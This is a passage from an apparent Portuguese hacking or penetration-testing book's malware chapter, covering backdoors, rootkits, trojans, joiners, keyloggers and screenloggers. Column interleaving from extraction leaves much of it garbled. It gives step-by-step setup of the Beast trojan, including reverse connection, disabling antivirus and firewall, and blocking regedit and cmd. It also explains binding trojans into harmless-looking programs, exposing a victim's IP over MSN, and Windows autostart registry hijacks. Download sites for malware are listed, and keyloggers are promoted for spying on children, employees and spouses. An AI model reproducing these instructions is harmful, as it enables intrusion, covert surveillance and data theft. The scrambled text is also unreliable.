mails falsos de sites pessoas. Quando receber um e-mail de algum amigo, social age, seja telefone, pessoalmente ou Internet)
especializados ou mesmo de programas que j possuem pedindo o que quanto no nvel
um pequeno geralmente ele no pediria, como para voc realizar um psicolgico (manipulando as emoes). Seria um grande
servidor de envio de e-mails embutido. depsito s pressas erro focar s no
No exemplo que irei mostrar, usaremos o programa na conta XXX para ele, ligue antes e confirme se a lado fsico da coisa, o treinamento dos empregados
Phasma 3000 pessoa mandou o e-mail. essencial. Voc tem
(www.8th-wonder.net). O interessante dele que se Evite cair no golpe. que fazer os responsveis entenderem que de nada
parece com um cliente 9.4.3 Messengers Instantneos adianta investir em
de e-mail comum, muito fcil de se usar. 142 softwares e hardwares, visando melhorar a segurana, se
Configuramos o Phasma 3000 para enviar um e-mail Outro cuidado a se tomar com os messengers, como no for feito um
como se tivesse Yahoo, ICQ e plano contra a Engenharia Social.
vindo de um endereo famoso qualquer. Poderia ser MSN. Um Engenheiro Social far de tudo para lhe Voc pode criar novas polticas de segurana e um
qualquer coisa, at algo convencer a aceitar um controle maior do
inexistente como <fulano@provedor.com>. determinado arquivo. Antigamente, usavam a desculpa contato feito com os funcionrios, mas se pegar muito
simplesmente uma de ser foto e, hoje, pesado, deixar
essas pessoas frustradas e a soluo no 100% fundos ainda passado despercebido muitas vezes por uma determinada porta de origem. Enfim, tendo acesso
eficiente. A melhor administradores ao cdigo, as
soluo seria simplesmente o treinamento. Todas as menos atentos. possibilidades so infinitas.
pessoas de uma 10.1.2 Backdoor de Login 10.1.4 Backdoor com Protocolos Incomuns
empresa que lidam com informaes importantes devem Em sistemas Unix, o programa de login o software que Muitas vezes, para impedir que se detecte o backdoor
passar por um geralmente verificando as
treinamento no qual iro aprender a identificar os tipos faz a autenticao de senha quando algum se conecta portas TCP e UDP abertas no sistema, cria-se backdoors
de ataques e como remotamente diferentes e
reagir a cada um deles. Uma outra idia interessante mquina (por Telnet, por exemplo) para que uma senha especficos. Alguns exemplos: os que utilizam tunneling
mandar uma espcie secreta seja criada, (como o exemplo
de artigo todo ms para os funcionrios mostrando novos dando acesso ao invasor na hora em que ele desejar. Isso que j vimos do backdoor www shell reverso) e outros
exemplos de faria com que a que conseguem
Engenharia Social e qual a tcnica para se proteger pessoa tivesse acesso a qualquer conta no sistema, mesmo transmitir dados atravs do cabealho do protocolo ICMP.
deles. Isso vai lembrlos administrador At mesmo para
sempre do perigo. ou root. Muitas vezes, difcil detectar esses ataques se fins de se burlar firewalls, alguns backdoors (como o
143 as senhas AckCMD para Windows
10 Malware estiverem criptografadas no cdigo. Depois, no captulo NT) no realizam a autenticao em 3 vias do TCP/IP
10.1 Backdoors sobre segurana, (Syn, Syn-ack, ack),
O nome backdoor significa porta dos fundos. um vamos ver como conseguir detectar de modo eficiente comunicando-se somente atravs do flag Ack. Enfim,
software que, se essas portas dos criatividade o que
instalado em algum sistema, permitir posterior acesso a fundos. no falta na hora de tentar sadas diferentes para se
este. Isso muito 10.1.3 Backdoor de Telnet conseguir acesso
utilizado por invasores quando ganham acesso shell a Quando um usurio faz Telnet a uma mquina, o servio privilegiado a um sistema.
alguma mquina e INETD escuta 10.1.5 Backdoor de Servio
querem manter um acesso para voltarem. Veremos alguns a porta, recebe a conexo e, depois, a passa para Quase todo servio de rede j foi alguma vez
exemplos de in.telnetd (arquivo de modificado por algum
portas dos fundos bem comuns, principalmente em configurao do servidor de Telnet nos sistemas baseados intruso. Verses com backdoor de finger, FTP, Rlogin,
sistemas Unix/Linux. em Unix), que INETD, RSH e outros
10.1.1 Backdoor Simples roda o login. Se os intrusos desconfiarem que os esto disponveis na rede h tempos. So, na maioria,
Tipo mais simples de porta dos fundos. Apenas conecta administradores estiveram backdoors simples
uma porta TCP checando o login.c por backdoors, podem modificar o que substituem servios como UUCP e outros, muitas vezes
a um shell do sistema. Assim, se voc entrar em uma porta in.telnetd de tal passando
qualquer que 144 despercebidos, pois no precisam ser adicionados na
tenha configurado, vai conseguir acessar o prompt de forma, modificando configuraes de terminal, por configurao inicial
comandos. Em geral, exemplo, e levando a para rodar. O interessante que, quando um ou outro
facilmente detectado em configuraes de INETD (onde fazer com que uma conexo em uma determinada porta servio modificado,
se inicializa os sempre gere um ainda fcil de conseguirmos detectar. E se forem muitos?
servios nos sistemas Unix/Linux), pois necessrio shell, sem requerer nenhum tipo de autenticao. Tambm Nesse caso no
adicion-lo para que poderiam ser mais um backdoor de servio, chamaremos esse
inicie junto com o sistema operacional. Mesmo assim, esse especificar que o shell de comandos s seria gerado se a agrupamento de
tipo de porta dos conexo viesse de rootkit (algo como o kit do administrador, nome bem
sugestivo).
10.1.6 Rootkit como um jogo. O termo cavalo de tria faz analogia ao trojan composto de um programa cliente e de um
Um dos pacotes mais populares para se instalar cavalo de madeira servidor. O primeiro
backdoors um que os gregos deram aos troianos, no famoso episdio da utilizado para controlar o computador da vtima
rootkit. Ele pode ser facilmente conseguido atravs de guerra de Tria. remotamente. nele que
pesquisa no Google. A maior vantagem dos trojans (abreviao de cavalo de temos botes como Obter Senhas, Controlar o Mouse,
Existem dezenas dessas ferramentas disponveis. Elas tria) em Editar o Registro ou
costumam substituir relao aos backdoors que eles utilizam o princpio de mesmo Visualizar a Tela.
muitos comandos do sistema por verses hackeadas. Engenharia Social O segundo arquivo o servidor, que deve ser colocado e
Olhando o manual para conseguir seu objetivo. Normalmente, quando no executado no
de um deles, voc ver a descrio dos arquivos que so h nenhum ponto sistema-alvo para que possa abrir uma porta de acesso
instalados de acesso ao sistema ou, mesmo que tenha, no possua para entrarmos. Um
substituindo os originais. Alguns exemplos interessantes: nenhuma falha problema com esse tipo de ferramenta que voc
145 conhecida ou autenticao de usurio e senha, fica difcil precisa saber o endereo
Sl: Torna-se root instantaneamente. para ganhar o IP da vtima para poder se conectar a ela. Isso
ps: Esconde os processos do sistema. acesso no-autorizado. Nesse momento entra o trojan, facilmente burlado pelas
ns: Modifica o comando Netstat para esconder conexes criando novas diversas opes que esses programas lhe oferecem: voc
com certas possibilidades, pois agir diretamente no fator humano pode receber a
mquinas. do problema. senha por e-mail, ICQ, MSN, CGI, IRC ou pode conseguir
ls: Impede que certos diretrios e arquivos sejam Apesar de serem classificados como vrus pelas atravs do mtodo
listados. companhias de que irei mostrar. Existe uma outra categoria dos trojans
du5: Esconde o espao real em disco que est sendo antivrus (na realidade, essas empresas sabem a cliente-servidor que
usado. diferena, mas, na hora de fazem conexo reversa.
10.2 Cavalos de Tria avisar o usurio leigo, dizem que um vrus mesmo) um A conexo reversa uma excelente alternativa ao
Esse tipo de ferramenta comeou a se popularizar na trojan bem mtodo tradicional.
Internet a partir diferente de um vrus comum. O cavalo de tria age de A situao se inverte: o servidor ser executado no seu
de 1997, quando foi lanado o famoso Back Orifice (uma acordo com quem o computador e o
brincadeira com o instalou no sistema, essa pessoa passa a controlar aquele cliente no sistema da vtima. Voc configura o seu
nome Back Office da Microsoft). Um cavalo de tria, ou computador como endereo IP antes de
trojan, um se estivesse sentada em frente a ele. J o vrus tem uma enviar o trojan ao alvo. Quando aquela pessoa executar
programa que, quando instalado no sistema de algum, seqncia de o arquivo, o
geralmente abre comandos pr-programada e age sempre de maneira programa vai se conectar ao servidor, que est na sua
uma porta TCP ou UDP para receber conexes externas, semelhante. Por esse mquina. A partir da
fornecendo motivo, considero os cavalos de tria uma ameaa bem voc pode ter acesso normalmente. Isso til para
normalmente o shell (prompt de comandos) daquele maior que os vrus alcanar computadores
sistema para um aos sistemas. dentro de redes internas, que utilizam IP privado. Para
possvel invasor. Isso no regra geral, j que alguns 10.2.1 Diferenas saber mais sobre
backdoors podem 10.2.1.1 Trojans Comuns conexo reversa, leia o captulo sobre burlar protees.
fazer tambm conexo reversa e outros tipos de tcnicas. 146 Esses cavalos de tria tambm so divididos por
Um cavalo de Back Orifice, Netbus, Subseven, Beast, NetDevil e Optix geraes. Vou
tria nada mais do que um backdoor disfarado de um so todos nomes de enumerar alguns nomes como exemplo e dividi-los
programa comum, programas famosos que lhe fornecem acesso no- corretamente:
autorizado. Esse tipo de
Primeira gerao: Netbus 1, BackOrifice 1, Girlfriend, atravs de um CGI, e-mail, ICQ, MSN, IRC - existem o que acontece. Usarei dois binders para fazer isso e
Masters muitas opes demonstrar o quanto
Paradise, Subseven - so trojans mais simples, sem muitos disponveis para isso. Claro que voc pode simplesmente fcil.
recursos utilizar conexo No primeiro binder, chamado AFX Executable Binder Pro,
Segunda gerao: WinCrash, SubSeven 2.1, Netbus 2, reversa (mais til, como eu disse antes, j que voc nunca ns somente
BackOrifice 2 precisar saber selecionamos dois ou mais arquivos que queremos juntar e
- j comeam a ter melhores opes, como um editor o endereo) ou descobrir o IP manualmente mesmo. Um mandamos ele
decente do pouco frente, realizar a tarefa. um programa simples, sem outras
registro, keyloggers melhores etc. mostrarei como faz-lo. opes alm dessa,
Terceira gerao: Net-Devil, Optix Pro, Beast, Lan 10.2.1.4 Trojans Comerciais como determinar o nome do arquivo a ser salvo,
Filtrator - So ferramentas no detectadas pelos antivrus, pois so modificar cones etc.
possuem recursos como criptografar o executvel, fazer comerciais, tais Existem programas que conseguem at criar entradas
conexo como VNC, Pc Anywhere e outros que podem ser especficas no
reversa e tunnelamento, burlar antivrus e firewalls e mais. facilmente modificados registro, mas no falarei deles aqui, o objetivo mostrar
Vou atravs do PE Explorer e ter seus menus escondidos e mesmo as funes
mostrar um pouco mais do trojan Beast como exemplo um chaves de registro mais bsicas de como esses programas atuam. A seguir,
pouco 148 temos outro
frente. alteradas, fazendo com que fiquem ocultos no sistema, exemplo:
147 mas ainda 149
NetDevil: Um dos trojans largamente usados na rede. indetectveis por qualquer tipo de ferramenta de Agora, utilizamos o MicroJoiner. Ele j tem algumas
10.2.1.2 Trojans Webdownloaders deteco de vrus e opes extras,
So trojans relativamente pequenos (geralmente tm softwares maliciosos. como determinar um cone para aparecer no executvel
cerca de, no mximo, 10.2.2 Joiners que ser gerado (o
10 Kb) que so programados exclusivamente para De nada adianta possuir um backdoor sem ter um bom boto do meio o cone que eu selecionei), determinar o
baixar cavalos de tria recipiente para nome do
maiores da Internet e execut-los. Pense em um GetRight coloc-lo, transformando-o em um cavalo de tria. Esse executvel gerado e at a opo Pack files que
dos invasores. Os tipo de programa comprime os arquivos logo
webdownloaders, quando rodados no sistema, puxam faz justamente isso. Com o joiner (ou binder, que a aps juntar os dois, tentando esconder do antivrus, como
com calma os mesma coisa) voc vimos no captulo
arquivos maiores e, se interrompidos, continuam de onde escolhe o arquivo da porta dos fundos, o programa onde sobre burlar protees. A seguir, as figuras da mensagem
pararam. um voc o deseja mostrada pelo
recurso til e muitas vezes imperceptvel. colocar e pronto. Rapidamente o executvel estar programa ao juntar os executveis e logo aps rodarmos
10.2.1.3 Trojans de Notificao gerado. Como o servidor esse novo
So, na sua maioria, plugins, geralmente utilizados com os dos trojans quase sempre j feito para rodar invisvel programa para ver o que acontece.
cavalos de tria (quase todos que eu 150
de primeira gerao, pois estes no possuem muitos citei so assim), o usurio comum de nada vai desconfiar Como se pode observar, ambos os programas que
recursos de na hora de adicionamos foram
notificao. Esses trojans simplesmente pegam o endereo executar a armadilha. executados ao mesmo tempo ao rodarmos o programa
IP da vtima a Para exemplificar como o processo funciona, vou colocar testejoiner, gerado
cada vez que ela conecta e o envia de alguma maneira o bloco de pelo nosso binder. Esses programas no esto limitados a
para o invasor. Seja notas e a calculadora do Windows em um nico dois executveis,
executvel e rodar para ver
voc pode colocar um programa comum e dois, trs, sobre ele na seo sobre segurana), que nada mais do exemplo a seguir que no 80 (que, como sabemos,
quatro backdoors que um Netstat significa
juntos. Claro que a chance do antivrus pegar vai grfico com uma caracterstica interessante, ele consegue servidor Web) e, sim, 1609, que uma porta aberta
aumentando e isso deixar mostrar qual de modo
o sistema do seu alvo bastante lento, mas, se precisar, conexo derivada de determinado programa. Ento, randmico para o recebimento do arquivo. Esse, com
existe a em uma ocasio absoluta
possibilidade de se fazer isso. especial, quando voc faz um contato direto com o certeza, o endereo IP da pessoa que eu quero. Veja:
Algumas sugestes de programas para juntar as portas computador da sua 153
do fundo: vtima, se utilizar o Active Ports, vai conseguir identificar o Claro que, como citei no incio, voc pode usar a
jogos simples como Pacincia (em softwares de Office endereo IP notificao dos
muito usados, como daquela pessoa. trojans ou at mesmo cavalos de tria especficos que
Word, Excel), animaes em Flash distribudas como Primeiro passo: Conseguir a condio especial na qual servem apenas para
programinhas e muito citei. descobrir e enviar o endereo IP real. Mas o interessante
mais. Basta s ser criativo. Normalmente, quando os messengers trocam simples desse mtodo que
10.2.3 Identificando o Endereo IP do Alvo mensagens, mostrei que ele no serve s para cavalos de tria.
De nada adianta voc ter o cavalo de tria instalado em apenas o endereo IP do servidor do Messenger Vamos supor que, por
algum mostrado, e no o algum motivo, voc queira realizar uma varredura
sistema se no conseguir descobrir o endereo IP daquela das pessoas que esto conversando. Para conseguir (scanneamento)
pessoa. Retirando visualizar esse procura de falhas no sistema-alvo ou mesmo uma
os mtodos mais simples, que so facilmente configurados, endereo, voc precisa fazer uma conexo direta com enumerao de usurios
como pedir ao aquela pessoa. e no sabe o endereo. Agora voc poder descobrir.
trojan para lhe enviar a senha por e-mail ou mesmo A maneira mais simples de se realizar isso enviar um 10.2.4 Maneiras de se Iniciar um Trojan
realizar conexo arquivo grande Vou descrever aqui algumas das maneiras que os
reversa, vamos ver como descobrir manualmente esse e, enquanto o usurio faz o download do arquivo, seu programas utilizam
endereo IP. Para endereo real para iniciar junto com o Windows. So chaves de registro
isso, nos basearemos no programa Netstat, o qual eu citei estar sendo mostrado. A seguir, temos o exemplo do bem escondidas,
na seo sobre envio de um arquivos de inicializao e outros truques. muito til
TCP/IP no incio do livro. Esse software consegue nos documento no Messenger: saber essas
mostrar quais as 152 informaes para localizar rapidamente determinados
151 Segundo passo: Como o endereo IP do usurio est cavalos de tria
conexes que esto ativas no momento, mas existe um exposto at quando esto no sistema.
problema: ns no acabar a transferncia, temos que abrir o Active Ports 10.2.4.1 Pasta Auto-iniciar
sabemos qual programa est usando determinada para conseguir C:\windows\start menu\programs\startup {Ingls}
conexo. De nada visualizar essa informao. O programa bem simples, C:\windows\Menu Dmarrer\Programmes\Dmarrage
adiantaria ento ter uma lista enorme se no sabemos basta abrir e {francs}
por onde comear. prestar ateno no IP remoto (remote IP) e na ltima 154
Justamente por isso vou mostrar como conseguir coluna direita C:\windows\All Users\Menu Iniciar\Programas\Iniciar
manualmente o (Path) que mostra o software que abriu a conexo. {Portugus}
endereo IP de algum atravs do MSN Messenger, mas Simples, no ? O Diretrio salvo em:
o que farei pode Observe, ainda, a porta remota (remote PORT) que a *
ser realizado por qualquer um. Utilizando o Active Ports nica no [HKEY_CURRENT_USER\Software\Microsoft\Windows\Cu
(falaremos mais rrentVersion\Exp
lorer\Shell Folders] a seguir. Sempre que voc ver um texto entre colchetes [ ], 10.2.4.7 Autoexec.bat
Startup="C:\windows\start menu\programs\startup" s seguir o Roda tudo em nvel de DOS
* caminho indicado pelas pastas do regedit. 10.2.4.8 Shell no Registro
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Cu [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ [HKEY_CLASSES_ROOT\exefile\shell\open\command] at
rrentVersion\Exp CurrentVersion\Ru ="\"%1\" %*"
lorer\User Shell Folders] nServices] [HKEY_CLASSES_ROOT\comfile\shell\open\command] at
Startup="C:\windows\start menu\programs\startup" "qualquercoisa"="c:\runfolder\program.exe" ="\"%1\" %*"
* [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ [HKEY_CLASSES_ROOT\batfile\shell\open\command] at
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\Ru ="\"%1\" %*"
CurrentVersion\ex nServicesOnce] [HKEY_CLASSES_ROOT\htafile\shell\Open\Command] at
plorer\User Shell Folders] "qualquercoisa"="c:\runfolder\program.exe" ="\"%1\" %*"
"Common Startup"="C:\windows\start [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ [HKEY_CLASSES_ROOT\piffile\shell\open\command] at
menu\programs\startup" CurrentVersion\Ru ="\"%1\" %*"
* n] [HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\she
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ "qualquercoisa"="c:\runfolder\program.exe" ll\open\command]
CurrentVersion\ex [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ at ="\"%1\" %*"
plorer\Shell Folders] CurrentVersion\Ru [HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\sh
"Common Startup"="C:\windows\start nOnce] ell\open\command]
menu\programs\startup" "qualquercoisa"="c:\runfolder\program.exe" at ="\"%1\" %*"
Mudar para outro diretrio que no seja o padro (ex: [HKEY_CURRENT_USER\Software\Microsoft\Windows\Cu [HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\sh
C:\windows\start rrentVersion\Run ell\open\command]
menu\programs\startup) far ] at ="\"%1\" %*"
com que todos os programas na pasta (ou diretrio) "qualquercoisa"="c:\runfolder\program.exe" [HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\shel
sejam executados. [HKEY_CURRENT_USER\Software\Microsoft\Windows\Cu l\Open\Command]
Observao: o Subseven 2.2 usa esse mtodo. rrentVersion\Run at ="\"%1\" %*"
10.2.4.2 Win.ini Once] [HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shel
[windows] "qualquercoisa"="c:\runfolder\program.exe" l\open\command]
load=file.exe [HKEY_CURRENT_USER\Software\Microsoft\Windows\Cu at ="\"%1\" %*"
run=file.exe rrentVersion\Run A chave deve ter um valor "%1 %*". Se for mudada para
10.2.4.3 System.ini Services] "servidor.exe %1 %*", o servidor.exe ser executado
[boot] "qualquercoisa"="c:\runfolder\program.exe" todas as vezes que
Shell=Explorer.exe file.exe 10.2.4.6 C:\windows\wininit.ini um arquivo exe/pif/com/bat/hta for executado.
10.2.4.4 C:\windows\winstart.bat Muito usado por SETUPs, executado uma s vez e o Utilizado pelo SubSeven como "mtodo desconhecido".
Voc pode criar esse bat com os comandos que quiser e Windows apaga o 10.2.4.9 ICQ Inet
ele ser executado arquivo. [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\
no incio. Exemplo de arquivo wininit.ini. Apps\test]
10.2.4.5 Registro [Rename] "Path"="teste.exe"
155 NUL=c:\windows\foto.exe "Startup"="c:\\teste"
Para editar o registro, use o programa regedit. Clique no Esse exemplo envia c:\windows\foto.exe para NUL, o que "Parameters"=""
boto Iniciar, significa que ser "Enable"="Yes"
selecione Executar e escreva Regedit. O programa deletada. E, detalhe, roda totalmente invisvel. [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\
abrir, como mostrado 156 Apps\
Essa chave inclui todos os arquivos executados quando o 10.2.5 Beast criado e se quer que este resida no diretrio do Windows
ICQ detecta Um dos cavalos de tria mais poderosos (e no to ou System. Vamos
conexo com a Internet. conhecido) da passar agora para as prximas configuraes, a
10.2.4.10 Explorer poca em que esse livro estava sendo escrito , sem notificao.
Windows 95, 98 e ME: O explorer.exe executado dvida, o Beast. Ele, 10.2.5.2 Notifications
atravs de uma como um trojan de terceira gerao, possui fantsticos 159
entrada no system.ini, mas no contem patch, ou seja, se recursos que, Nessa opo, voc vai configurar o mtodo de
c:\explorer.exe existir, ele ser executado no lugar de acredito, sero incorporados e melhorados por futuras notificao do endereo
157 ferramentas. So s IP. Traduzindo: como voc vai saber o endereo da
c:\$winpath\explorer.exe. vezes detalhes simples, mas que conseguem fazer a pessoa, se por e-mail,
Windows NT, 2000 e XP: Durante a inicializao, o diferena entre os ICQ ou CGI. A nica exceo a opo SIN, que
Windows NT outros do gnero. Vou detalhar as principais funes que utilizada para a conexo
4.0, 2000 e XP consultam a entrada de registro shell fazem esse reversa. Nela voc coloca o seu prprio endereo IP ou
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window programa to especial no mundo da segurana de hoje e um endereo de
s explicar a sua domnio (no caso da imagem, coloquei um dinmico). Esse
NT\CurrentVersion\Winlogon\Shell para determinar o importncia. passo
programa que 158 importante para que voc receba a conexo de volta. No
ser rodado como shell. Abra o cliente do Beast e clique em Build Server. Vamos nosso exemplo,
Por padro, o valor explorer.exe. ver que opes vamos deixar essa opo marcada (Enable SIN). Vamos
10.2.4.11 Componente Active-X interessantes o servidor desse cavalo de tria possui. para a configurao
[HKEY_LOCAL_MACHINE\Software\Microsoft\Active 10.2.5.1 Server Settings de inicializao.
Setup\Installed Aqui voc tem as configuraes gerais do servidor. Definir 10.2.5.3 Startup
Components\KeyName] porta e Voc definir aqui de quais chaves de registro o servidor
StubPath=C:\Diretrio\arquivo.exe senha primeiramente. Depois, voc vai decidir se deseja se utilizar.
Acredite ou no, isso inicia o arquivo.exe antes do shell conexo normal Pode ver que ele no mais utiliza aquelas chaves comuns
(explorer.exe) e de (direct connection) ou reversa (reverse connection) e se (Run,
qualquer outro programa iniciado pelas chaves RUN. voc deseja que o RunServices) que todo mundo conhece. O fato de ele se
10.2.4.12 Informao Interessante servidor seja um executvel comum ou seja injetado em instalar como
[HKEY_LOCAL_MACHINE\Software\CLASSES\ShellScrap] alguma aplicao. ActiveX faz com que consiga ser executado antes de
at ="Scrap Como assim? Se ele for injetado no Internet Explorer, por muitas ferramentas de
object" exemplo, ele vai 160
"NeverShowExt"="" agir como plugin deste programa, anexando uma nova proteo (como antivrus) na inicializao do sistema.
A chave NeverShowExt tem a funo de esconder a DLL s suas funes, Falando em proteo,
extenso real de e conseguindo burlar certas ferramentas de proteo, vamos para a configurao onde poderemos elimin-las.
arquivos SHS. alm de dificultar 10.2.5.4 Antivrus-Firewall Kill
Isso significa que, se voc renomear um arquivo como muito o fechamento do programa. Experimente injetar no Um dos melhores recursos do Beast a capacidade que
Garota.jpg.shs, ele svchost.exe ou ele tem de
mostra apenas Garota.jpg em todos os programas, csrss.exe; ainda pior de conseguir encerrar a execuo conseguir eliminar diversas protees, fechando os seus
incluindo o Windows do trojan. processos (ou
Explorer. Se voc acrescentar novos tipos de extenso, Voc tambm pode escolher o nome do arquivo exe ou mesmo parando servios). Aqui voc pode ativar o
muito mais ser dll que ser encerramento das
escondido.
ferramentas de proteo, escolher de quantos em quantos 162 teclado e salvar no disco ou enviar essa informao para
segundos essas A ltima configurao simples. Apenas escolha o cone um endereo
protees sero fechadas e desabilitar o firewall do que ficar especfico. Um excelente recurso para espionar o que
Windows XP. Veja a sendo mostrado no executvel do servidor que vai ser outras pessoas fazem
seguir o pequeno banco de dados de processos a fechar gerado. Voc pode no computador, considerado como um vrus por alguns e
que o programa usar algum dos padres ou mesmo escolher qualquer como uma
possui. outro que estiver no importante ferramenta comercial por outros.
Ele vem com 381 processos j configurados para serem disco. 10.3.1 Keyloggers Locais
fechados por Agora, lembre-se que configurei o Beast para receber So os tipos mais comuns de capturadores de teclas. Eles
ordem alfabtica (note que o ltimo o firewall pessoal conexo reversa. rodam
zone alarm). Ele Coloque a porta que voc configurou no servidor e ative- localmente e somente guardam a informao no disco
161 a clicando em Start para ser lida depois.
consegue fechar at 500 processos, mesmo que seja s de Listening (assumindo que o servidor que criamos j foi Podem ou no criptografar esses dados. Outra coisa
5 em 5 executado em algum interessante que
segundos. Ento, adicionei mais dois interessantes: o outro local). Pouco tempo depois, o seguinte popup podem ser em software ou fsicos. Keylogger fsico?
REGEDIT, para que a aparecer. Deixe-me exemplificar. Vamos supor que voc deseja
pessoa infectada no consiga remover as chaves do Isso significa que uma vtima nova foi encontrada (as colocar um
registro do Beast e o maravilhas da keylogger em um computador, mas sabe que esse sistema
CMD para que tambm no consiga acessar o prompt de conexo reversa... voc recebe a conexo de um servidor possui um
comandos do de trojan como se antivrus poderoso e uma ferramenta para controlar
sistema. Existem muitos outros que voc pode mandar recebesse uma mensagem do MSN, com muita facilidade). entradas no registro.
fechar, como Pode ver na Ou pior: voc no pode usar esse sistema ou porque tem
TASKLIST (lista de tarefas), MSCONFIG e outros, depende janela principal do programa que uma vtima j est outra pessoa
da sua disponvel e pronta 164
imaginao. para nos conectarmos a ela. usando o tempo todo ou porque colocaram senhas para
10.2.5.5 Misc 163 voc no entrar.
Aqui voc vai ter algumas opes diversas, como apagar Como fazer para se conectar a essa vtima? Nada difcil, Simplesmente adquira um keylogger fsico que se parece
o executvel basta clicar duas com um adaptador
do servidor quando for rodado (melt server), habilitar vezes no cone e pronto! Voc j pode realizar as funes de teclado (como o Ghost Keylogger), ligue o teclado
keylogger, limpar os que quiser no nele e encaixe essa
pontos de restaurao do Windows XP, mostrar uma sistema-alvo. Ele todo seu. Espero que tenha ficado ligao no computador. A partir da, ele comea a
mensagem falsa de claro esse tutorial de capturar tudo que for
erro, abrir a porta somente quando estiver conectado configurao do Beast, novamente afirmo que as digitado no teclado, mesmo que o computador nem esteja
Internet, no tendncias que esses ligado! Depois
mostrar notificaes em rede local (LAN) e atrasar a programas criaram so muito teis e sero utilizadas por s tirar o adaptador, ligar no seu computador e baixar
execuo do servidor muito tempo. toda a informao.
(delay execution). Esta ltima pode servir quando voc for 10.3 Keyloggers Imagem de um keylogger fsico.
juntar o servidor Outro tipo de ferramenta que veremos como malware so De qualquer maneira, seja fsico ou em software, um
a um outro programa e quiser que a execuo do trojan os keylogger local
demore um pouco keyloggers. So programas especializados em capturar o uma boa ferramenta para voc verificar o que seus
ao rodar o arquivo. que se digita no filhos/funcionrios/cnjuges andam fazendo na sua
10.2.5.6 ExeIcon ausncia. A maioria das
ferramentas dessa categoria comercial (no detectadas que o e-mail saiu e o assunto. Pode configurar tambm se usurio. Isso pode ser feito configurando de vrias
por antivrus) e gostaria de maneiras. De tempo em
algumas at gratuitas, como o Home Keylogger, visto a receber esses logs a cada x minutos ou todos uma vez tempo (de 20 em 20 segundos, por exemplo) ou mesmo
seguir: ao dia. atravs do clique
O Home Keylogger um programa muito simples de se 10.4 Screenloggers do mouse pode-se configurar para tirar uma pequena
usar. Quando Esse tipo de software muitas vezes captura teclas imagem ao redor de
voc roda, ele cria um iconezinho na bandeja do (keylogger), mas 167
sistema e mostra um conseguem capturar tambm a tela do usurio onde foi dado o clique, digamos, por exemplo, de 25x25
menu quando voc clica nesse cone. Nesse menu, voc (screenlogger) e fazem disso pixels ou at
pode ver os logs, a sua especialidade. As implicaes deste processo so menor. assim que os fraudadores conseguem os botes
colocar autorun (inicializar com o sistema), esconder o vrias. Por exemplo: pressionados
cone da barra de 166 em um teclado virtual de banco.
tarefas, limpar o que foi capturado e mais algumas voc sempre digitou sua senha de banco no teclado e Aqui encerramos o captulo sobre softwares maliciosos
informaes sobre o viviam pegando com (malwares).
programa. Se voc precisar capturar apenas informaes um keylogger. O seu gerente ento lhe recomendou Ainda temos os spywares, que so ferramentas colocadas
nos computadores comear a utilizar o em programas
aos quais voc tem acesso local, uma excelente opo. teclado virtual, aquele visual, bonitinho, que voc clica comerciais para obter conhecimento sobre o seu usurio,
165 com o mouse. Bom, como o que ele
10.3.2 Keyloggers Remotos com os screenloggers, consegue-se pegar aquele tambm, gosta de comprar e quais os seus gostos, e depois utilizar
A diferena do keylogger local para o remoto somente pois esses isso para
a maneira de programas tiram pequenas fotos da tela, seja de um mostrar-lhe lojas on-line ou enviar e-mail com spam.
lidar com os logs, j que o mtodo de se capturar o pedao especfico dela Apesar de chato, no
mesmo. Enquanto o ou inteira. diretamente relacionado ao Penetration Test, ento
local apenas salva em disco, o remoto consegue tambm Programas assim tm dado muita dor de cabea para falarei sobre como
realizar essa todos. As remover esses spywares na seo sobre segurana
tarefa; mais um recurso extra: enviar essas informaes instituies financeiras e lojas on-line perdem, pois tm somente.
pela Internet, seja que criar novos 10.5 Softwares
para algum e-mail, servidor FTP ou CGI. Isso aumenta de recursos de segurana, j que s digitar a senha 10.5.1 Windows
modo incrvel as visualmente com o mouse ActivePorts (www.superdownloads.com.br)
possibilidades, j que possvel tornar o keylogger uma no funciona mais. As companhias de antivrus lutam para PerfectKeylogger (www.blazingtools.com)
espcie de poder reconhecer Spy Lantern Keylogger (www.spydex.com)
backdoor ou mesmo um trojan ao juntar o executvel dele todas as ferramentas dessa categoria, mas muitas so NetDevil (www.trojanfrance.com)
com o de algum comerciais e no Beast (www.trojanfrance.com)
outro programa inofensivo. podem ser acusadas como vrus. E, por ltimo, o usurio OptixPro (www.trojanfrance.com)
Na imagem, voc v a tpica configurao de envio de e- comum mais MicroJoiner (www.trojanfrance.com)
mail de um uma vez prejudicado. 10.5.2 Linux
keylogger remoto, no caso do exemplo, o Spy Lantern Dois screenloggers muito conhecidos so o Perfect Adore (www.egocrew.de)
Keylogger. Voc tem Keylogger e o Ardamax Fuckit (www.egocrew.de)
que configurar o servidor STMP colocando o seu usurio e Keylogger. Knark (www.egocrew.de)
senha para envio Veja que o Perfect Keylogger capturou uma imagem do LRK (www.egocrew.de)
(ou conseguir um servidor que suporte relay), a conta da desktop do B0STT (www.egocrew.de)
qual vai parecer 10.6 Soluo
Existem diversos passos que voc pode seguir para se que significa explorar, nesse caso? Vamos tentar Um ponto importante para notar aqui que as palavras
proteger contra conseguir acesso noautorizado marcos e flavio
malwares. Os principais so: ao nosso sistema-alvo e aos seus comandos internos, se esto delimitadas com aspas simples. Presumindo que os
Utilizar um bom antivrus (se possvel dois, em conjunto) e possvel, com acesso de superusurio (ou administrador). campos nome e
atualiz-lo Este ser o auge sobrenome esto sendo fornecidos pela entrada do
sempre que puder. do Penetration Test e, claro, o motivo de todos os outros usurio, um atacante
168 passos para que poderia conseguir injetar alguns comandos de SQL nesse
Utilizar um firewall pessoal que possua recurso de chegssemos aqui. Comearemos vendo como explorar pedido,
sandbox ou SQL Injection, PHP colocando valores da seguinte maneira:
